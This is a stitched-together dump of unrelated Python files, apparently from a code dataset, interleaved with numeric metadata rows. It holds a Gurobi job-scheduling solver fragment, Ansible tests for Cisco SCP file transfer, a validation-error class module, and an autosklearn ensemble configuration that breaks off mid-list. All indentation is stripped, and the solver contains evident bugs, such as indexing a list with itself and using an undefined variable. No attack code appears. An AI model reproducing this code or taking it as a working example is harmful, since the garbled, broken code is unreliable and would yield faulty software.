m += xsum(S[j] for j in range(left, right)) == 1
i = right
m.optimize(max_seconds=max_seconds, max_seconds_same_incumbent=1)
solution_matrix = list()
for i in range(len(required_resource_list)):
start = i * maximum_block
solution = list()
for j in range(start, start+maximum_block_list[i]):
res = X[j].x
if res is not None:
res = 0 if res < 0.5 else 1
solution.append(res)
solution_matrix.append(solution)
soft_matrix = list()
for i in range(len(soft_id_list)):
soft_matrix.append(S[i].x)
return solution_matrix, soft_matrix
class MIPSolverResourceUserConstrain(object):
def __init__(self, method):
self.method = method
def check_if_packable(self, required_resource_list, required_block_list, maximum_block_list, resource_num_list, method):
if method == 'knapsack':
maximum_block = max(maximum_block_list)
m = Model(solver_name=GRB)
var_len = len(required_resource_list) * maximum_block
X = [m.add_var(var_type=BINARY) for i in range(len(required_resource_list) * maximum_block)]
m.objective = maximize(X[-1])
# job-wise
for i in range(len(required_resource_list)):
m += xsum(X[j] for j in range(i * maximum_block, i * maximum_block + maximum_block_list[i])) == required_block_list[i]
if maximum_block_list[i] < maximum_block:
m += xsum(X[j] for j in range(i * maximum_block + maximum_block_list[i], (i+1) * maximum_block)) == 0
# resource-wise
for i in range(maximum_block):
m += xsum(X[j] * required_resource_list[j // maximum_block] for j in range(i, var_len, maximum_block) ) <= resource_num_list[i]
m.optimize()
feasible = not any([X[i].x is None for i in range(var_len)])
solution = list()
if feasible:
for block_idx in range(maximum_block):
left_resource_num = resource_num_list[resource_num_list]
for var_idx in range(block_idx, var_len, maximum_block):
left_resource_num -= X[var_idx].x * required_resource_list[var_idx // maximum_block]
solution.append(left_resource_num)
elif method == 'greedy':
maximum_block = max(maximum_block_list)
solution = [resource_num_list[i] for i in range(maximum_block)]
resource_tuple_list = [(a, b, c) for a, b, c in zip(maximum_block_list, required_block_list, required_resource_list)]
resource_tuple_list.sort(reverse=True)
for maximum_block, required_block, required_resource in resource_tuple_list:
feasible, cnt = False, 0
for i in range(maximum_block - 1, -1, -1):
if solution[i] >= required_resource:
cnt += 1
solution[i] -= required_resource
if cnt == required_block:
feasible = True
break
if not feasible: break
elif method == 'greedy-smooth':
maximum_block = max(maximum_block_list)
solution = [resource_num_list[i] for i in range(maximum_block)]
resource_tuple_list = [(a, b, c) for a, b, c in zip(maximum_block_list, required_block_list, required_resource_list)]
resource_tuple_list.sort(key=lambda e: (-e[2], e[0] - e[1], -e[0]))
for maximum_block, required_block, required_resource in resource_tuple_list:
feasible, cnt = False, 0
# idx_resource_pair = sorted([(idx, resource) for idx, resource in enumerate(solution)], key=lambda e: (e[1], e[0]), reverse=True)
idx_resource_pair = sorted([(idx, resource) for idx, resource in enumerate(solution)], key=lambda e: (e[0], e[1]), reverse=True)
for idx, resource in idx_resource_pair:
if idx < maximum_block and resource >= required_resource:
cnt += 1
solution[idx] -= required_resource
if cnt == required_block:
feasible = True
break
if not feasible: break
return feasible, solution
def fast_check_if_packable(self, required_resource, required_block, maximum_block, existing_solution, resource_num_list):
if required_block > maximum_block: return False, existing_solution
feasible_block = 0
if len(existing_solution) < maximum_block:
existing_solution += [resource_num_list[i] for i in range(len(existing_solution), maximum_block)]
for i in range(maximum_block):
if existing_solution[i] >= required_resource:
feasible_block += 1
feasible = feasible_block >= required_block
if feasible:
for i in range(maximum_block - 1, -1, -1):
if existing_solution[i] >= required_resource and required_block > 0:
existing_solution[i] -= required_resource
required_block -= 1
return feasible, existing_solution
def batch_fast_check_if_packable(self, required_resource_dict, required_block_dict, maximum_block_dict, existing_solution_dict, resource_num_dict, user_list):
solution = dict()
for user in user_list:
required_resource_list = required_resource_dict[user]
required_block_list = required_block_dict[user]
maximum_block_list = maximum_block_dict[user]
existing_solution = existing_solution_dict[user]
resource_num_list = resource_num_dict[user]
solution[user] = list()
if len(maximum_block_list) == 0:
feasible = True
solution[user] = copy.deepcopy(existing_solution)
continue
maximum_block = max(maximum_block_list)
for i in range(maximum_block):
if i < len(existing_solution):
solution[user].append(existing_solution[i])
else:
solution[user].append(resource_num_list[i])
resource_tuple_list = [(a, b, c) for a, b, c in zip(maximum_block_list, required_block_list, required_resource_list)]
# resource_tuple_list.sort(key=lambda e: (-e[2], e[0] - e[1], -e[0]))
resource_tuple_list.sort(key=lambda e: (e[0], e[0] - e[1], e[2]))
for maximum_block, required_block, required_resource in resource_tuple_list:
feasible, cnt = False, 0
for i in range(maximum_block - 1, -1, -1):
if solution[user][i] >= required_resource:
cnt += 1
solution[user][i] -= required_resource
if cnt == required_block:
feasible = True
break
if not feasible: break
if not feasible:
solution = None
break
return feasible, solution
def batch_fast_job_selection(self, required_resource_dict, required_block_dict, maximum_block_dict, existing_solution_dict, resource_num_dict, user_list):
base_idx = 0
solution_matrix = list()
for user in user_list:
required_resource_list = required_resource_dict[user]
required_block_list = required_block_dict[user]
maximum_block_list = maximum_block_dict[user]
existing_solution = existing_solution_dict[user]
resource_num_list = resource_num_dict[user]
if len(maximum_block_list) == 0:
feasible = True
continue
maximum_block = max(maximum_block_list)
solution = list()
for i in range(maximum_block):
if i < len(existing_solution):
solution.append(existing_solution[i])
else:
solution.append(resource_num_list[i])
idx_list = [i for i in range(len(maximum_block_list))]
solution_matrix = solution_matrix + idx_list
resource_tuple_list = [(a, b, c, i) for a, b, c, i in zip(maximum_block_list, required_block_list, required_resource_list, idx_list)]
resource_tuple_list.sort(key=lambda e: ( -e[2], e[0] - e[1], -e[0]))
for maximum_block, required_block, required_resource, idx in resource_tuple_list:
feasible, cnt = False, 0
cache_solution = [0 for _ in range(maximum_block)]
for i in range(maximum_block - 1, -1, -1):
if solution[i] >= required_resource:
cnt += 1
solution[i] -= required_resource
cache_solution[i] = 1
if cnt == required_block:
feasible = True
break
solution_matrix[idx + base_idx] = cache_solution
if not feasible: break
base_idx += len(resource_tuple_list)
if not feasible:
break
return feasible, solution_matrix
def job_selection(self, required_resource_dict, required_block_dict, maximum_block_dict, resource_num_dict, user_list, objective, max_seconds=5):
required_block_list = list()
maximum_block_list = list()
required_resource_list = list()
for user in user_list:
if len(required_resource_dict[user]) > 0:
required_block_list += required_block_dict[user]
maximum_block_list += maximum_block_dict[user]
required_resource_list += required_resource_dict[user]
maximum_block = max(maximum_block_list)
if isinstance(resource_num_list, int):
resource_num_list = [resource_num_list for _ in range(maximum_block)]
m = Model(solver_name=GRB)
var_len = len(maximum_block_list) * maximum_block
X = [m.add_var(var_type=BINARY) for i in range(len(maximum_block_list) * maximum_block)]
if objective == 'random':
m.objective = maximize(X[-1])
elif objective == 'minimize':
m.objective = maximize(-xsum(X[j] * required_resource_list[j // maximum_block] for j in range(0, var_len, maximum_block)) )
elif objective == 'maximize':
m.objective = maximize(xsum(X[j] * required_resource_list[j // maximum_block] for j in range(0, var_len, maximum_block)) )
else:
raise NotImplementedError
# time-wise
for i in range(len(required_resource_list)):
m += xsum(X[j] for j in range(i * maximum_block, i * maximum_block + maximum_block_list[i])) == required_block_list[i]
if maximum_block_list[i] < maximum_block:
m += xsum(X[j] for j in range(i * maximum_block + maximum_block_list[i], (i+1) * maximum_block)) == 0
# resource-wise
for i in range(maximum_block):
base_j = 0
for user in user_list:
bottom = i + maximum_block * base_j
top = bottom + maximum_block * (base_j + len(required_resource_dict[user]) + 1)
m += xsum(X[j] * required_resource_list[j // maximum_block] for j in range(bottom, top, maximum_block) ) <= required_resource_dict[user][i]
base_j += len(required_resource_dict[user])
m.optimize(max_seconds=max_seconds)
solution_matrix = list()
for i in range(len(required_resource_list)):
start = i * maximum_block
solution = list()
for j in range(start, start+maximum_block_list[i]):
res = X[j].x
if res is not None:
res = 0 if res < 0.5 else 1
solution.append(X[j].x)
solution_matrix.append(solution)
return solution_matrix
class SemiPreemptMIPSolver(object):
def __init__(self, method):
self.method = method
def job_selection(self, required_resource_list, required_block_list, maximum_block_list, reward_list, existing_solution, resource_num_list, max_seconds=10):
if len(maximum_block_list) == 0:
return list()
maximum_block = max(maximum_block_list)
solution = list()
for i in range(maximum_block):
if i < len(existing_solution):
solution.append(existing_solution[i])
else:
solution.append(resource_num_list[i])
if True:
solution_matrix = list()
for i in range(len(required_resource_list)):
sol = None
# for j in range(maximum_block_list[i] - 1, required_block_list[i] - 1, -1):
for j in range(required_block_list[i], maximum_block_list[i]+1):
left = j - required_block_list[i]
right = left + required_block_list[i]
done = True
for k in range(left, right):
# print(k, left, right, len(solution), maximum_block)
if solution[k] < required_resource_list[i]:
done = False
if done:
sol = [0 for _ in range(maximum_block_list[i])]
for k in range(left, right):
sol[k] = 1
solution[k] -= required_resource_list[i]
break
solution_matrix.append(sol)
return solution_matrix
m = Model(solver_name=GRB)
X = [m.add_var(var_type=BINARY) for i in range(len(required_resource_list) * maximum_block)]
obj_list = [X[i] * reward_list[i // maximum_block] for i in range(len(required_resource_list) * maximum_block)]
m.objective = maximize(xsum(obj_list[i] for i in range(len(obj_list))))
# job-wise
for i in range(len(required_resource_list)):
delta_len = maximum_block_list[i] - required_block_list[i] + 1
m += xsum(X[j] for j in range(i * maximum_block, i * maximum_block + delta_len)) <= 1
if delta_len < maximum_block:
m += xsum(X[j] for j in range(i * maximum_block + delta_len, (i+1) * maximum_block)) == 0
# resource-wise
for i in range(maximum_block):
resource_list = list()
for j in range(len(required_block_list)):
delta_len = maximum_block_list[j] - required_block_list[j] + 1
for k in range(delta_len):
if k <= i and k + required_block_list[j] - 1 >= i:
resource_list.append(X[j * maximum_block + k] * required_resource_list[j]) # TODO
m += xsum(resource_list) <= solution[i]
m.optimize(max_seconds=max_seconds)
solution_matrix = list()
for i in range(len(required_resource_list)):
start = i * maximum_block
sol = list()
start_idx = -1
for j in range(start, start+maximum_block_list[i]):
res = X[j].x
if res is not None:
res = 0 if res < 0.5 else 1
sol.append(res)
if res == 1: start_idx = j
assert sum(sol) <= 1, 'only allowed to select one solution'
if sum(sol) == 0:
solution_matrix.append(None)
else:
for j in range(start_idx, start_idx + required_block_list[i]):
sol[j - start] = 1
solution_matrix.append(sol)
return solution_matrix
| 47.423025 | 231 | 0.573719 | 4,351 | 35,425 | 4.386808 | 0.036313 | 0.150259 | 0.066223 | 0.038036 | 0.897941 | 0.873265 | 0.842825 | 0.82082 | 0.796092 | 0.777859 | 0 | 0.010528 | 0.337699 | 35,425 | 746 | 232 | 47.486595 | 0.803001 | 0.053747 | 0 | 0.763113 | 0 | 0 | 0.004869 | 0 | 0 | 0 | 0 | 0.00134 | 0.001692 | 1 | 0.033841 | false | 0 | 0.00846 | 0.003384 | 0.091371 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
9e0dfbab527453981816f7ea52313bc56bccd5db | 3,223 | py | Python | tests/test_cisco_file_transfer.py | ktbyers/netsidecar | 993ea9a4d1cb1562f833b50533d5b2284fe68773 | [
"Apache-2.0"
] | 30 | 2015-05-27T22:22:57.000Z | 2021-07-15T18:12:32.000Z | tests/test_cisco_file_transfer.py | ktbyers/scp_sidecar | 993ea9a4d1cb1562f833b50533d5b2284fe68773 | [
"Apache-2.0"
] | 10 | 2015-05-26T01:04:09.000Z | 2021-04-06T17:26:06.000Z | tests/test_cisco_file_transfer.py | ktbyers/netsidecar | 993ea9a4d1cb1562f833b50533d5b2284fe68773 | [
"Apache-2.0"
] | 16 | 2015-05-28T15:47:13.000Z | 2020-11-30T10:07:36.000Z | from DEVICE_CREDS import my_device
def test_setup_initial_state(ansible_module):
'''
Transfer initial file to remote device
'''
ansible_args = dict(
source_file="/home/kbyers/scp_sidecar/tests/cisco_logging.txt",
dest_file="cisco_logging.txt",
enable_scp="true",
)
ansible_args.update(my_device)
module_out = ansible_module.cisco_file_transfer(**ansible_args)
def test_file_already_exists(ansible_module):
'''
Make sure file already exists and not 'changed'
'''
ansible_args = dict(
source_file="/home/kbyers/scp_sidecar/tests/cisco_logging.txt",
dest_file="cisco_logging.txt",
)
ansible_args.update(my_device)
module_out = ansible_module.cisco_file_transfer(**ansible_args)
for host, result in module_out.items():
assert result['changed'] is False
assert result['msg'] == 'File exists and has correct MD5'
def test_xfer_file(ansible_module):
'''
Transfer a new file to the remote device
'''
# Will disable scp after test
ansible_args = dict(
source_file="/home/kbyers/scp_sidecar/tests/cisco_logging1.txt",
dest_file="cisco_logging.txt",
enable_scp="true",
)
ansible_args.update(my_device)
module_out = ansible_module.cisco_file_transfer(**ansible_args)
for host, result in module_out.items():
assert result['changed'] is True
assert result['msg'] == 'File successfully transferred to remote device'
def test_verify_file(ansible_module):
'''
Verify the new file on the remote device
'''
ansible_args = dict(
source_file="/home/kbyers/scp_sidecar/tests/cisco_logging1.txt",
dest_file="cisco_logging.txt",
)
ansible_args.update(my_device)
module_out = ansible_module.cisco_file_transfer(**ansible_args)
for host, result in module_out.items():
assert result['changed'] is False
assert result['msg'] == 'File exists and has correct MD5'
def test_xfer_and_scp_enable(ansible_module):
'''
Transfer a new file to the remote device
Ansible module must enable scp for this to work
'''
ansible_args = dict(
source_file="/home/kbyers/scp_sidecar/tests/cisco_logging.txt",
dest_file="cisco_logging.txt",
enable_scp="true",
)
ansible_args.update(my_device)
module_out = ansible_module.cisco_file_transfer(**ansible_args)
for host, result in module_out.items():
assert result['changed'] is True
assert result['msg'] == 'File successfully transferred to remote device'
def test_overwrite(ansible_module):
'''
Verify overwrite when file already exists results in an error
'''
ansible_args = dict(
source_file="/home/kbyers/scp_sidecar/tests/cisco_logging1.txt",
dest_file="cisco_logging.txt",
enable_scp="true",
overwrite="false",
)
ansible_args.update(my_device)
module_out = ansible_module.cisco_file_transfer(**ansible_args)
for host, result in module_out.items():
assert result['changed'] is False
assert result['msg'] == 'File already exists and overwrite set to false'
| 31.910891 | 80 | 0.678871 | 420 | 3,223 | 4.947619 | 0.171429 | 0.095284 | 0.064966 | 0.060635 | 0.804139 | 0.804139 | 0.804139 | 0.804139 | 0.804139 | 0.804139 | 0 | 0.00199 | 0.220602 | 3,223 | 100 | 81 | 32.23 | 0.825239 | 0.108284 | 0 | 0.761905 | 0 | 0 | 0.238935 | 0.104714 | 0 | 0 | 0 | 0 | 0.15873 | 1 | 0.095238 | false | 0 | 0.015873 | 0 | 0.111111 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
9e19481a71bce970e44ad2d8aa2050276bf9bd71 | 8,473 | py | Python | valera/errors/__init__.py | nikitanovosibirsk/valera | f2111f5b886fe58f6f8054c20de35102c4518114 | [
"Apache-2.0"
] | null | null | null | valera/errors/__init__.py | nikitanovosibirsk/valera | f2111f5b886fe58f6f8054c20de35102c4518114 | [
"Apache-2.0"
] | 2 | 2021-12-05T11:41:46.000Z | 2022-02-01T15:13:19.000Z | valera/errors/__init__.py | nikitanovosibirsk/valera | f2111f5b886fe58f6f8054c20de35102c4518114 | [
"Apache-2.0"
] | null | null | null | from abc import ABC, abstractmethod
from typing import TYPE_CHECKING, Any, Tuple, Type
from district42 import GenericSchema
from th import PathHolder
if TYPE_CHECKING:
from .._formatter import Formatter
__all__ = ("ValidationError", "TypeValidationError", "ValueValidationError",
"MinValueValidationError", "MaxValueValidationError", "LengthValidationError",
"MinLengthValidationError", "MaxLengthValidationError", "AlphabetValidationError",
"SubstrValidationError", "RegexValidationError", "MissingElementValidationError",
"ExtraElementValidationError", "MissingKeyValidationError", "ExtraKeyValidationError",
"SchemaMismatchValidationError",)
class ValidationError(ABC):
def __eq__(self, other: Any) -> bool:
return isinstance(other, self.__class__) and (self.__dict__ == other.__dict__)
@abstractmethod
def format(self, formatter: "Formatter") -> str:
pass
class TypeValidationError(ValidationError):
def __init__(self, path: PathHolder, actual_value: Any, expected_type: Type[Any]) -> None:
self.path = path
self.actual_value = actual_value
self.expected_type = expected_type
def format(self, formatter: "Formatter") -> str:
return formatter.format_type_error(self)
def __repr__(self) -> str:
return (f"{self.__class__.__name__}({self.path!r}, {self.actual_value!r}, "
f"{self.expected_type!r})")
class ValueValidationError(ValidationError):
def __init__(self, path: PathHolder, actual_value: Any, expected_value: Any) -> None:
self.path = path
self.actual_value = actual_value
self.expected_value = expected_value
def format(self, formatter: "Formatter") -> str:
return formatter.format_value_error(self)
def __repr__(self) -> str:
return (f"{self.__class__.__name__}({self.path!r}, {self.actual_value!r}, "
f"{self.expected_value!r})")
class MinValueValidationError(ValidationError):
def __init__(self, path: PathHolder, actual_value: Any, min_value: Any) -> None:
self.path = path
self.actual_value = actual_value
self.min_value = min_value
def format(self, formatter: "Formatter") -> str:
return formatter.format_min_value_error(self)
def __repr__(self) -> str:
return (f"{self.__class__.__name__}({self.path!r}, {self.actual_value!r}, "
f"{self.min_value!r})")
class MaxValueValidationError(ValidationError):
def __init__(self, path: PathHolder, actual_value: Any, max_value: Any) -> None:
self.path = path
self.actual_value = actual_value
self.max_value = max_value
def format(self, formatter: "Formatter") -> str:
return formatter.format_max_value_error(self)
def __repr__(self) -> str:
return (f"{self.__class__.__name__}({self.path!r}, {self.actual_value!r}, "
f"{self.max_value!r})")
class LengthValidationError(ValidationError):
def __init__(self, path: PathHolder, actual_value: Any, length: int) -> None:
self.path = path
self.actual_value = actual_value
self.length = length
def format(self, formatter: "Formatter") -> str:
return formatter.format_length_error(self)
def __repr__(self) -> str:
return (f"{self.__class__.__name__}({self.path!r}, {self.actual_value!r}, "
f"{self.length!r})")
class MinLengthValidationError(ValidationError):
def __init__(self, path: PathHolder, actual_value: Any, min_length: int) -> None:
self.path = path
self.actual_value = actual_value
self.min_length = min_length
def format(self, formatter: "Formatter") -> str:
return formatter.format_min_length_error(self)
def __repr__(self) -> str:
return (f"{self.__class__.__name__}({self.path!r}, {self.actual_value!r}, "
f"{self.min_length!r})")
class MaxLengthValidationError(ValidationError):
def __init__(self, path: PathHolder, actual_value: Any, max_length: int) -> None:
self.path = path
self.actual_value = actual_value
self.max_length = max_length
def format(self, formatter: "Formatter") -> str:
return formatter.format_max_length_error(self)
def __repr__(self) -> str:
return (f"{self.__class__.__name__}({self.path!r}, {self.actual_value!r}, "
f"{self.max_length!r})")
class AlphabetValidationError(ValidationError):
def __init__(self, path: PathHolder, actual_value: str, alphabet: str) -> None:
self.path = path
self.actual_value = actual_value
self.alphabet = alphabet
def format(self, formatter: "Formatter") -> str:
return formatter.format_alphabet_error(self)
def __repr__(self) -> str:
return (f"{self.__class__.__name__}({self.path!r}, {self.actual_value!r}, "
f"{self.alphabet!r})")
class SubstrValidationError(ValidationError):
def __init__(self, path: PathHolder, actual_value: Any, substr: str) -> None:
self.path = path
self.actual_value = actual_value
self.substr = substr
def format(self, formatter: "Formatter") -> str:
return formatter.format_substr_error(self)
def __repr__(self) -> str:
return (f"{self.__class__.__name__}({self.path!r}, {self.actual_value!r}, "
f"{self.substr!r})")
class RegexValidationError(ValidationError):
def __init__(self, path: PathHolder, actual_value: Any, pattern: str) -> None:
self.path = path
self.actual_value = actual_value
self.pattern = pattern
def format(self, formatter: "Formatter") -> str:
return formatter.format_regex_error(self)
def __repr__(self) -> str:
return (f"{self.__class__.__name__}({self.path!r}, {self.actual_value!r}, "
f"{self.pattern!r})")
class MissingElementValidationError(ValidationError):
def __init__(self, path: PathHolder, actual_value: Any, index: int) -> None:
self.path = path
self.actual_value = actual_value
self.index = index
def format(self, formatter: "Formatter") -> str:
return formatter.format_missing_element_error(self)
def __repr__(self) -> str:
return f"{self.__class__.__name__}({self.path!r}, {self.actual_value!r}, {self.index!r})"
class ExtraElementValidationError(ValidationError):
def __init__(self, path: PathHolder, actual_value: Any, index: int) -> None:
self.path = path
self.actual_value = actual_value
self.index = index
def format(self, formatter: "Formatter") -> str:
return formatter.format_extra_element_error(self)
def __repr__(self) -> str:
return f"{self.__class__.__name__}({self.path!r}, {self.actual_value!r}, {self.index!r})"
class MissingKeyValidationError(ValidationError):
def __init__(self, path: PathHolder, actual_value: Any, missing_key: Any) -> None:
self.path = path
self.actual_value = actual_value
self.missing_key = missing_key
def format(self, formatter: "Formatter") -> str:
return formatter.format_missing_key_error(self)
def __repr__(self) -> str:
return (f"{self.__class__.__name__}({self.path!r}, {self.actual_value!r}, "
f"{self.missing_key!r})")
class ExtraKeyValidationError(ValidationError):
def __init__(self, path: PathHolder, actual_value: Any, extra_key: Any) -> None:
self.path = path
self.actual_value = actual_value
self.extra_key = extra_key
def format(self, formatter: "Formatter") -> str:
return formatter.format_extra_key_error(self)
def __repr__(self) -> str:
return (f"{self.__class__.__name__}({self.path!r}, {self.actual_value!r}, "
f"{self.extra_key!r})")
class SchemaMismatchValidationError(ValidationError):
def __init__(self, path: PathHolder, actual_value: Any,
expected_schemas: Tuple[GenericSchema, ...]) -> None:
self.path = path
self.actual_value = actual_value
self.expected_schemas = expected_schemas
def format(self, formatter: "Formatter") -> str:
return formatter.format_schema_missmatch_error(self)
def __repr__(self) -> str:
return (f"{self.__class__.__name__}({self.path!r}, {self.actual_value!r}, "
f"{self.expected_schemas!r})")
| 36.209402 | 97 | 0.666352 | 972 | 8,473 | 5.399177 | 0.074074 | 0.125762 | 0.085747 | 0.067073 | 0.727515 | 0.727515 | 0.721037 | 0.721037 | 0.711319 | 0.60747 | 0 | 0.000299 | 0.211731 | 8,473 | 233 | 98 | 36.364807 | 0.785447 | 0 | 0 | 0.479042 | 0 | 0.011976 | 0.207483 | 0.155317 | 0 | 0 | 0 | 0 | 0 | 1 | 0.281437 | false | 0.005988 | 0.02994 | 0.185629 | 0.592814 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 1 | 1 | 0 | 0 | 8 |
f508a780eb19e7a306a06b6907af989399b783b8 | 21,621 | py | Python | 001_jasmine.py | bigdatamatta/ChaLearn_Automatic_Machine_Learning_Challenge_2015 | a9acb6906ff141e7c24cff80f92efef7d7c3ff09 | [
"BSD-2-Clause"
] | 1 | 2019-06-12T19:55:35.000Z | 2019-06-12T19:55:35.000Z | 001_jasmine.py | bigdatamatta/ChaLearn_Automatic_Machine_Learning_Challenge_2015 | a9acb6906ff141e7c24cff80f92efef7d7c3ff09 | [
"BSD-2-Clause"
] | null | null | null | 001_jasmine.py | bigdatamatta/ChaLearn_Automatic_Machine_Learning_Challenge_2015 | a9acb6906ff141e7c24cff80f92efef7d7c3ff09 | [
"BSD-2-Clause"
] | null | null | null | import argparse
import os
import numpy as np
import autosklearn
import autosklearn.data
import autosklearn.data.data_manager
import autosklearn.models.evaluator
from ParamSklearn.classification import ParamSklearnClassifier
parser = argparse.ArgumentParser()
parser.add_argument('input')
parser.add_argument('output')
args = parser.parse_args()
input = args.input
dataset = 'jasmine'
output = args.output
D = autosklearn.data.data_manager.DataManager(dataset, input)
X = D.data['X_train']
y = D.data['Y_train']
X_valid = D.data['X_valid']
X_test = D.data['X_test']
# Subset of features found with RFE. Feature with least importance in sklearn
# RF removed. Afterwards, trained RF on remaining features with 5CV. In the
# end, choose feature set with lowest error
features = [6, 8, 10, 12, 16, 18, 20, 21, 22, 25, 26, 33, 37, 38, 39, 40, 42,
44, 46, 47, 52, 55, 56, 58, 62, 77, 78, 79, 82, 85, 91, 92, 94, 96,
101, 104, 106, 108, 110, 119, 122, 125, 130, 131, 133, 137, 139,
140, 141]
X = X[:, features]
X_valid = X_valid[:, features]
X_test = X_test[:, features]
# Weights of the ensemble members as determined by Ensemble Selection
weights = np.array([0.140000, 0.120000, 0.080000, 0.060000, 0.040000, 0.040000,
0.040000, 0.040000, 0.040000, 0.040000, 0.020000, 0.020000,
0.020000, 0.020000, 0.020000, 0.020000, 0.020000, 0.020000,
0.020000, 0.020000, 0.020000, 0.020000, 0.020000, 0.020000,
0.020000, 0.020000, 0.020000, 0.020000])
# Ensemble members found by SMAC
configurations = [
{'balancing:strategy': 'weighting',
'classifier': 'random_forest',
'imputation:strategy': 'median',
'preprocessor': 'select_percentile_classification',
'random_forest:bootstrap': 'True',
'random_forest:criterion': 'gini',
'random_forest:max_depth': 'None',
'random_forest:max_features': '1.58545644982',
'random_forest:max_leaf_nodes': 'None',
'random_forest:min_samples_leaf': '3.0',
'random_forest:min_samples_split': '2.0',
'random_forest:n_estimators': '100.0',
'rescaling:strategy': 'min/max',
'select_percentile_classification:percentile': '39.9235093683',
'select_percentile_classification:score_func': 'f_classif'},
{'balancing:strategy': 'weighting',
'classifier': 'random_forest',
'imputation:strategy': 'most_frequent',
'preprocessor': 'select_rates',
'random_forest:bootstrap': 'False',
'random_forest:criterion': 'entropy',
'random_forest:max_depth': 'None',
'random_forest:max_features': '0.6715305958',
'random_forest:max_leaf_nodes': 'None',
'random_forest:min_samples_leaf': '4.0',
'random_forest:min_samples_split': '3.0',
'random_forest:n_estimators': '100.0',
'rescaling:strategy': 'standard',
'select_rates:alpha': '0.486873466534',
'select_rates:mode': 'fwe',
'select_rates:score_func': 'f_classif'},
{'balancing:strategy': 'weighting',
'classifier': 'random_forest',
'imputation:strategy': 'mean',
'preprocessor': 'select_percentile_classification',
'random_forest:bootstrap': 'False',
'random_forest:criterion': 'gini',
'random_forest:max_depth': 'None',
'random_forest:max_features': '1.82773631717',
'random_forest:max_leaf_nodes': 'None',
'random_forest:min_samples_leaf': '2.0',
'random_forest:min_samples_split': '3.0',
'random_forest:n_estimators': '100.0',
'rescaling:strategy': 'min/max',
'select_percentile_classification:percentile': '50.0',
'select_percentile_classification:score_func': 'chi2'},
{'balancing:strategy': 'none',
'classifier': 'random_forest',
'fast_ica:algorithm': 'deflation',
'fast_ica:fun': 'logcosh',
'fast_ica:n_components': '832.0',
'fast_ica:whiten': 'False',
'imputation:strategy': 'median',
'preprocessor': 'fast_ica',
'random_forest:bootstrap': 'False',
'random_forest:criterion': 'gini',
'random_forest:max_depth': 'None',
'random_forest:max_features': '2.93148979051',
'random_forest:max_leaf_nodes': 'None',
'random_forest:min_samples_leaf': '5.0',
'random_forest:min_samples_split': '7.0',
'random_forest:n_estimators': '100.0',
'rescaling:strategy': 'min/max'},
{'balancing:strategy': 'weighting',
'classifier': 'random_forest',
'imputation:strategy': 'mean',
'preprocessor': 'select_percentile_classification',
'random_forest:bootstrap': 'False',
'random_forest:criterion': 'entropy',
'random_forest:max_depth': 'None',
'random_forest:max_features': '1.79654377812',
'random_forest:max_leaf_nodes': 'None',
'random_forest:min_samples_leaf': '1.0',
'random_forest:min_samples_split': '6.0',
'random_forest:n_estimators': '100.0',
'rescaling:strategy': 'min/max',
'select_percentile_classification:percentile': '50.0',
'select_percentile_classification:score_func': 'chi2'},
{'balancing:strategy': 'weighting',
'classifier': 'extra_trees',
'extra_trees:bootstrap': 'False',
'extra_trees:criterion': 'entropy',
'extra_trees:max_depth': 'None',
'extra_trees:max_features': '1.81061189332',
'extra_trees:min_samples_leaf': '1.0',
'extra_trees:min_samples_split': '3.0',
'extra_trees:n_estimators': '100.0',
'imputation:strategy': 'mean',
'preprocessor': 'select_rates',
'rescaling:strategy': 'none',
'select_rates:alpha': '0.201722721361',
'select_rates:mode': 'fwe',
'select_rates:score_func': 'f_classif'},
{'balancing:strategy': 'weighting',
'classifier': 'extra_trees',
'extra_trees:bootstrap': 'False',
'extra_trees:criterion': 'gini',
'extra_trees:max_depth': 'None',
'extra_trees:max_features': '1.76442905847',
'extra_trees:min_samples_leaf': '4.0',
'extra_trees:min_samples_split': '6.0',
'extra_trees:n_estimators': '100.0',
'imputation:strategy': 'mean',
'preprocessor': 'select_rates',
'rescaling:strategy': 'min/max',
'select_rates:alpha': '0.113572172949',
'select_rates:mode': 'fwe',
'select_rates:score_func': 'f_classif'},
{'balancing:strategy': 'weighting',
'classifier': 'random_forest',
'imputation:strategy': 'median',
'preprocessor': 'select_rates',
'random_forest:bootstrap': 'False',
'random_forest:criterion': 'entropy',
'random_forest:max_depth': 'None',
'random_forest:max_features': '2.87832643035',
'random_forest:max_leaf_nodes': 'None',
'random_forest:min_samples_leaf': '1.0',
'random_forest:min_samples_split': '19.0',
'random_forest:n_estimators': '100.0',
'rescaling:strategy': 'min/max',
'select_rates:alpha': '0.110716868617',
'select_rates:mode': 'fwe',
'select_rates:score_func': 'f_classif'},
{'balancing:strategy': 'weighting',
'classifier': 'extra_trees',
'extra_trees:bootstrap': 'True',
'extra_trees:criterion': 'entropy',
'extra_trees:max_depth': 'None',
'extra_trees:max_features': '3.23138088334',
'extra_trees:min_samples_leaf': '3.0',
'extra_trees:min_samples_split': '6.0',
'extra_trees:n_estimators': '100.0',
'imputation:strategy': 'mean',
'preprocessor': 'select_percentile_classification',
'rescaling:strategy': 'min/max',
'select_percentile_classification:percentile': '45.1994111355',
'select_percentile_classification:score_func': 'chi2'},
{'balancing:strategy': 'none',
'classifier': 'random_forest',
'fast_ica:algorithm': 'deflation',
'fast_ica:fun': 'logcosh',
'fast_ica:n_components': '509.0',
'fast_ica:whiten': 'True',
'imputation:strategy': 'mean',
'preprocessor': 'fast_ica',
'random_forest:bootstrap': 'False',
'random_forest:criterion': 'entropy',
'random_forest:max_depth': 'None',
'random_forest:max_features': '2.2727882732',
'random_forest:max_leaf_nodes': 'None',
'random_forest:min_samples_leaf': '2.0',
'random_forest:min_samples_split': '12.0',
'random_forest:n_estimators': '100.0',
'rescaling:strategy': 'min/max'},
